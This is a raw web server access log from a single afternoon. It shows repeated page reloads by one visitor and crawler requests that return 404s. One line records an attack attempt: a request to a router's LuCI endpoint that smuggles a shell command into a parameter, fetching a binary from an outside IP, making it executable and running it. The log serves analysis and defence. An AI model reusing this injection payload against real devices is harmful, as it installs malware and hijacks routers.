178.165.178.173 - - [24/Apr/2024:18:01:36 +0200] "GET /entry.php?id=10271&&ser=974435 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=974374" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:01:36 +0200] "GET /gui/javascript/form_form.js?1713974496 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974435" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:02:21 +0200] "GET /entry.php?id=10271&&ser=974481 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974420" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:02:21 +0200] "GET /gui/javascript/form_form.js?1713974541 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974481" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
3.128.199.88 - - [24/Apr/2024:18:02:26 +0200] "GET /faq.php?sid=6bd468e95116564b939041cdf25799ed HTTP/1.1" 404 363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:02:37 +0200] "GET /entry.php?id=10271&&ser=974496 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974435" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:02:37 +0200] "GET /gui/javascript/form_form.js?1713974557 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974496" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
18.116.36.192 - - [24/Apr/2024:18:02:52 +0200] "GET /viewtopic.php?p=3616&sid=5a7725e7f34ac2c4490b504a330ad7be HTTP/1.1" 404 369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:03:21 +0200] "GET /entry.php?id=10271&&ser=974541 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974481" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:03:21 +0200] "GET /gui/javascript/form_form.js?1713974601 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974541" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:03:38 +0200] "GET /entry.php?id=10271&&ser=974557 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974496" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:03:38 +0200] "GET /gui/javascript/form_form.js?1713974618 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974557" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
3.133.141.6 - - [24/Apr/2024:18:03:55 +0200] "GET /gallery/image_page.php?album_id=1&image_id=114&sid=669362553ce370259aee3a1d9b4f7bb1 HTTP/1.1" 404 378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:04:21 +0200] "GET /entry.php?id=10271&&ser=974601 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974541" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:04:21 +0200] "GET /gui/javascript/form_form.js?1713974661 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974601" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:04:39 +0200] "GET /entry.php?id=10271&&ser=974618 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974557" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:04:39 +0200] "GET /gui/javascript/form_form.js?1713974679 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974618" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:05:22 +0200] "GET /entry.php?id=10271&&ser=974661 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974601" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:05:22 +0200] "GET /gui/javascript/form_form.js?1713974722 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974661" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
18.119.107.161 - - [24/Apr/2024:18:05:35 +0200] "GET /ucp.php?mode=delete_cookies&sid=ee2027afd7228c6023ecfb1a54683eab HTTP/1.1" 404 363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:05:40 +0200] "GET /entry.php?id=10271&&ser=974679 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974618" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:05:40 +0200] "GET /gui/javascript/form_form.js?1713974740 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974679" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
3.15.221.67 - - [24/Apr/2024:18:06:05 +0200] "GET /gallery/search.php?search_id=commented&sid=8d282303ddc0f32e383aae10a67190e9 HTTP/1.1" 404 374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:06:22 +0200] "GET /entry.php?id=10271&&ser=974722 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974661" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:06:22 +0200] "GET /gui/javascript/form_form.js?1713974782 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974722" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:06:41 +0200] "GET /entry.php?id=10271&&ser=974740 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=974679" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:06:41 +0200] "GET /gui/javascript/form_form.js?1713974801 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974740" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
3.144.189.177 - - [24/Apr/2024:18:06:46 +0200] "GET /search.php?sid=d52f22e61e33b56ce127072ea08e2a3f HTTP/1.1" 404 366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.141.244.201 - - [24/Apr/2024:18:07:09 +0200] "GET /viewtopic.php?f=8&t=540&sid=8a7f3d7614094a2f09aefec01c9df986 HTTP/1.1" 404 369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:07:22 +0200] "GET /entry.php?id=10271&&ser=974782 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974722" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:07:22 +0200] "GET /gui/javascript/form_form.js?1713974842 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974782" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:07:42 +0200] "GET /entry.php?id=10271&&ser=974801 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974740" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:07:42 +0200] "GET /gui/javascript/form_form.js?1713974862 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974801" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
3.21.97.61 - - [24/Apr/2024:18:08:05 +0200] "GET /faq.php?sid=bfaec595496a6f0d1fd8e97abfb9ae60 HTTP/1.1" 404 363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:08:22 +0200] "GET /entry.php?id=10271&&ser=974842 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974782" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:08:23 +0200] "GET /gui/javascript/form_form.js?1713974903 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974842" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:08:43 +0200] "GET /entry.php?id=10271&&ser=974862 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974801" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:08:43 +0200] "GET /gui/javascript/form_form.js?1713974923 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974862" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:09:23 +0200] "GET /entry.php?id=10271&&ser=974903 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974842" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:09:23 +0200] "GET /gui/javascript/form_form.js?1713974963 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974903" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
3.138.125.2 - - [24/Apr/2024:18:09:34 +0200] "GET /memberlist.php?mode=viewprofile&u=2&sid=92e5024bdf8c82b2d3f0dc17cbc4003e HTTP/1.1" 404 370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:09:44 +0200] "GET /entry.php?id=10271&&ser=974923 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974862" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:09:44 +0200] "GET /gui/javascript/form_form.js?1713974984 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974923" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:10:23 +0200] "GET /entry.php?id=10271&&ser=974963 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974903" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:10:23 +0200] "GET /gui/javascript/form_form.js?1713975023 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974963" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:10:45 +0200] "GET /entry.php?id=10271&&ser=974984 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974923" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:10:45 +0200] "GET /gui/javascript/form_form.js?1713975045 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=974984" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
18.216.190.167 - - [24/Apr/2024:18:11:13 +0200] "GET /portal.php?np=5&news=1&sid=d96ece9718d93205b727b747037b745e HTTP/1.1" 404 366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:11:27 +0200] "GET /entry.php?id=10271&&ser=975023 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974963" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:11:28 +0200] "GET /gui/javascript/form_form.js?1713975087 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975023" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:11:46 +0200] "GET /entry.php?id=10271&&ser=975045 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=974984" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:11:46 +0200] "GET /gui/javascript/form_form.js?1713975106 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975045" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
46.174.191.29 - - [24/Apr/2024:18:12:01 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
178.165.178.173 - - [24/Apr/2024:18:12:32 +0200] "GET /entry.php?id=10271&&ser=975087 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975023" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:12:32 +0200] "GET /gui/javascript/form_form.js?1713975152 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975087" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
3.135.183.187 - - [24/Apr/2024:18:12:33 +0200] "GET /viewtopic.php?f=18&t=165&p=4056&sid=b3a24d0d556ac034bf249531e3f59988 HTTP/1.1" 404 369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:12:47 +0200] "GET /entry.php?id=10271&&ser=975106 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975045" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:12:47 +0200] "GET /gui/javascript/form_form.js?1713975167 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975106" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
185.224.128.43 - - [24/Apr/2024:18:13:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.165.178.173 - - [24/Apr/2024:18:13:36 +0200] "GET /entry.php?id=10271&&ser=975152 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975087" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:13:36 +0200] "GET /gui/javascript/form_form.js?1713975216 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975152" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:13:48 +0200] "GET /entry.php?id=10271&&ser=975167 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=975106" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:13:48 +0200] "GET /gui/javascript/form_form.js?1713975228 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975167" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:14:40 +0200] "GET /entry.php?id=10271&&ser=975216 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975152" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:14:41 +0200] "GET /gui/javascript/form_form.js?1713975280 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975216" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:14:49 +0200] "GET /entry.php?id=10271&&ser=975228 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975167" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:14:49 +0200] "GET /gui/javascript/form_form.js?1713975289 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
3.134.104.173 - - [24/Apr/2024:18:14:59 +0200] "GET /viewforum.php?f=18&sid=31ad4cadb8234f1b2ae79d8324e2b37d HTTP/1.1" 404 369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
93.117.4.95 - - [24/Apr/2024:18:15:26 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
93.117.4.95 - - [24/Apr/2024:18:15:26 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.142.182.92 - - [24/Apr/2024:18:15:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.165.178.173 - - [24/Apr/2024:18:15:45 +0200] "GET /entry.php?id=10271&&ser=975280 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975216" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:15:45 +0200] "GET /gui/javascript/form_form.js?1713975345 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975280" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:15:50 +0200] "GET /entry.php?id=10271&&ser=975289 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:15:50 +0200] "GET /gui/javascript/form_form.js?1713975350 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975289" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:16:45 +0200] "GET /entry.php?id=10271&&ser=975345 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975280" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:16:45 +0200] "GET /gui/javascript/form_form.js?1713975405 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975345" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:16:51 +0200] "GET /entry.php?id=10271&&ser=975350 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975289" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:16:51 +0200] "GET /gui/javascript/form_form.js?1713975411 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975350" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
18.118.140.108 - - [24/Apr/2024:18:17:14 +0200] "GET /about.php?sid=a5df14573dd7a316e12eee01bddb20fe HTTP/1.1" 404 365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
13.59.218.147 - - [24/Apr/2024:18:17:29 +0200] "GET /portal.php?np=5&news=0&sid=e6e7f181764da48e1242e13aab208120 HTTP/1.1" 404 366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:17:45 +0200] "GET /entry.php?id=10271&&ser=975405 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975345" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:17:45 +0200] "GET /gui/javascript/form_form.js?1713975465 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975405" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:17:52 +0200] "GET /entry.php?id=10271&&ser=975411 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975350" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:17:52 +0200] "GET /gui/javascript/form_form.js?1713975472 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975411" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
3.135.183.187 - - [24/Apr/2024:18:18:02 +0200] "GET /about.php?sid=d48824a3b868bcfa05de97184a916009 HTTP/1.1" 404 365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.118.184.237 - - [24/Apr/2024:18:18:11 +0200] "GET /memberlist.php?mode=viewprofile&u=244&sid=671af1e9a294eb38a7a1aed36dd7c870 HTTP/1.1" 404 370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:18:46 +0200] "GET /entry.php?id=10271&&ser=975465 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975405" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:18:46 +0200] "GET /gui/javascript/form_form.js?1713975526 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975465" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
178.165.178.173 - - [24/Apr/2024:18:18:53 +0200] "GET /entry.php?id=10271&&ser=975472 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=975411" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.165.178.173 - - [24/Apr/2024:18:18:53 +0200] "GET /gui/javascript/form_form.js?1713975533 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=975472" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
3.144.202.167 - - [24/Apr/2024:18:19:06 +0200] "GET /robots.txt HTTP/1.1" 404 366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.144.202.167 - - [24/Apr/2024:18:19:06 +0200] "GET /ucp.php?i=pm&folder=inbox&sid=4692f1057508123d37aec457bb572fab HTTP/1.1" 404 363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.165.178.173 - - [24/Apr/2024:18:19:46 +0200] "GET /entry.php?id=10271&&ser=975526 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=975465" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
